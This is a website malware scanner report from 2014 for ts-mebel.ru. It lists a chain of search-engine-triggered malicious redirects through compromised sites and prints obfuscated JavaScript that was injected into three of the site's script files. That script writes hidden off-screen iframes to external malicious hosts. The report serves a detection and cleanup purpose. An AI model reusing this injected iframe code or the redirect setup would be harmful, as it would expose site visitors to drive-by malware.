New scan:

Malware Scanner report for ts-mebel.ru

Malicious/Suspicious/Total urls checked
3/0/15
3 pages have malicious code. See details below
Blacklists
OK
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL. The chain of malicious redirects found:
->http://alfsystem.com.my/includes/domit/1.php
844 websites infected. alfsystem.com.my is marked by Google as suspicious.
->http://www.csra.de/includes/domit/1.php
346 websites infected. www.csra.de is marked by Google as suspicious.
->http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php
56 websites infected. jbtconsultinggroup.com is marked by Google as suspicious.
->http://google.ru
42 websites infected.

The website "ts-mebel.ru" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/0/15
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://ts-mebel.ru/
(imitation of visitor from search engine)

GET / HTTP/1.1
Host: ts-mebel.ru
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 302 Found
Connection: close
Date: Mon, 11 Aug 2014 20:40:22 GMT
Location: http://alfsystem.com.my/includes/domit/1.php
Server: nginx/1.4.4
Content-Length: 0
Content-Type: text/html
X-Powered-By: PHP/5.2.17-pl0-gentoo
malicious
URL: http://alfsystem.com.my/includes/domit/1.php
(imitation of visitor from search engine)

GET /includes/domit/1.php HTTP/1.1
Host: alfsystem.com.my
Referer: http://www.google.com/search?q=redirect+check2
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 11 Aug 2014 20:40:23 GMT
Location: http://www.csra.de/includes/domit/1.php
Server: Apache
Content-Length: 0
Content-Type: text/html
X-Powered-By: PHP/5.3.23
malicious
URL: http://www.csra.de/includes/domit/1.php
(imitation of visitor from search engine)

GET /includes/domit/1.php HTTP/1.1
Host: www.csra.de
Referer: http://www.google.com/search?q=redirect+check3
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 11 Aug 2014 20:40:23 GMT
Location: http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php
Server: Apache
Content-Length: 0
Content-Type: text/html
X-Powered-By: PHP/5.4.30
malicious
URL: http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php
(imitation of visitor from search engine)

GET /components/com_user/views/login/tmpl/1/all3.php HTTP/1.1
Host: jbtconsultinggroup.com
Referer: http://www.google.com/search?q=redirect+check4
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 11 Aug 2014 20:40:24 GMT
Location: http://google.ru
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
malicious

Scanned pages/files

RequestServer responseStatus
http://ts-mebel.ru/
200 OK
Content-Length: 15875
Content-Type: text/html
clean
http://ts-mebel.ru/plugins/system/jcemediabox/js/mediaobject.js?v=105
200 OK
Content-Length: 1259
Content-Type: application/x-javascript
clean
http://ts-mebel.ru/plugins/system/jcemediabox/js/jcemediabox.js?v=105
200 OK
Content-Length: 1259
Content-Type: application/x-javascript
clean
http://ts-mebel.ru/plugins/system/jcemediabox/addons/default.js?v=105
200 OK
Content-Length: 1259
Content-Type: application/x-javascript
clean
http://ts-mebel.ru/plugins/system/jcemediabox/addons/twitter.js?v=105
200 OK
Content-Length: 1259
Content-Type: application/x-javascript
clean
http://ts-mebel.ru/media/system/js/caption.js
200 OK
Content-Length: 591
Content-Type: application/x-javascript
clean
http://ts-mebel.ru/plugins/content/highslide/highslide-full.packed.js
200 OK
Content-Length: 1167
Content-Type: application/x-javascript
clean
http://ts-mebel.ru/plugins/content/highslide/easing_equations.js
200 OK
Content-Length: 1167
Content-Type: application/x-javascript
clean
http://ts-mebel.ru/plugins/content/highslide/swfobject.js
200 OK
Content-Length: 1167
Content-Type: application/x-javascript
clean
http://ts-mebel.ru/plugins/content/highslide/config/js/highslide-sitesettings.js
404 Not Found
Content-Length: 1105
Content-Type: text/html
clean
http://ts-mebel.ru/test404page.js
404 Not Found
Content-Length: 1105
Content-Type: text/html
clean
http://ts-mebel.ru/plugins/system/protos.lightbox.js
200 OK
Content-Length: 5837
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Argisuliterkas() {
var dude = navigator.userAgent;
var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1);
if (!unificas) {
document.write('<iframe src="http://mamondigos.smyasociados.com.ar/matikasmatik15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>');
}
}
Argisuliterkas();
... 1115 bytes are skipped ...
/> return matchet ? decodeURIComponent(matchet[1]) : undefined;
}



if (!uuu_agent_ch()) {
var cookie = getClock('hamon19paster18f');
if (cookie == undefined) {
setClock('hamon19paster18f', true, 260002);



document.write('<iframe s'+'rc'+'="http://zuneit.jurisdoctor101.com/jtrgxhgatqetju13.html" style="position:absolute;le'+'ft:-1373px;to'+'p:-1373px;" height="133" width="133"></iframe>');
}
}
})();

Antivirus reports:

Fortinet
JS/IFrame.XX!tr
ESET-NOD32
JS/Iframe.JT

http://ts-mebel.ru/components/com_jcomments/js/jcomments-v2.0.js
200 OK
Content-Length: 5827
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Argisuliterkas() {
var dude = navigator.userAgent;
var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1);
if (!unificas) {
document.write('<iframe src="http://mamondigos.smyasociados.com.ar/matikasmatik15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>');
}
}
Argisuliterkas();
... 1115 bytes are skipped ...
/> return matchet ? decodeURIComponent(matchet[1]) : undefined;
}



if (!uuu_agent_ch()) {
var cookie = getClock('hamon19paster18f');
if (cookie == undefined) {
setClock('hamon19paster18f', true, 260002);



document.write('<iframe s'+'rc'+'="http://zuneit.jurisdoctor101.com/jtrgxhgatqetju13.html" style="position:absolute;le'+'ft:-1373px;to'+'p:-1373px;" height="133" width="133"></iframe>');
}
}
})();

Antivirus reports:

Fortinet
JS/IFrame.XX!tr
ESET-NOD32
JS/Iframe.JT

http://ts-mebel.ru/components/com_jcomments/libraries/joomlatune/ajax.js
200 OK
Content-Length: 6587
Content-Type: application/x-javascript
clean
http://ts-mebel.ru/templates/newdesign5/script.js
200 OK
Content-Length: 5830
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Argisuliterkas() {
var dude = navigator.userAgent;
var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1);
if (!unificas) {
document.write('<iframe src="http://mamondigos.smyasociados.com.ar/matikasmatik15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>');
}
}
Argisuliterkas();
... 1115 bytes are skipped ...
/> return matchet ? decodeURIComponent(matchet[1]) : undefined;
}



if (!uuu_agent_ch()) {
var cookie = getClock('hamon19paster18f');
if (cookie == undefined) {
setClock('hamon19paster18f', true, 260002);



document.write('<iframe s'+'rc'+'="http://zuneit.jurisdoctor101.com/jtrgxhgatqetju13.html" style="position:absolute;le'+'ft:-1373px;to'+'p:-1373px;" height="133" width="133"></iframe>');
}
}
})();

Antivirus reports:

Fortinet
JS/IFrame.XX!tr
ESET-NOD32
JS/Iframe.JT

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=ts-mebel.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ts-mebel.ru/

Result: ts-mebel.ru is not infected or malware details are not published yet.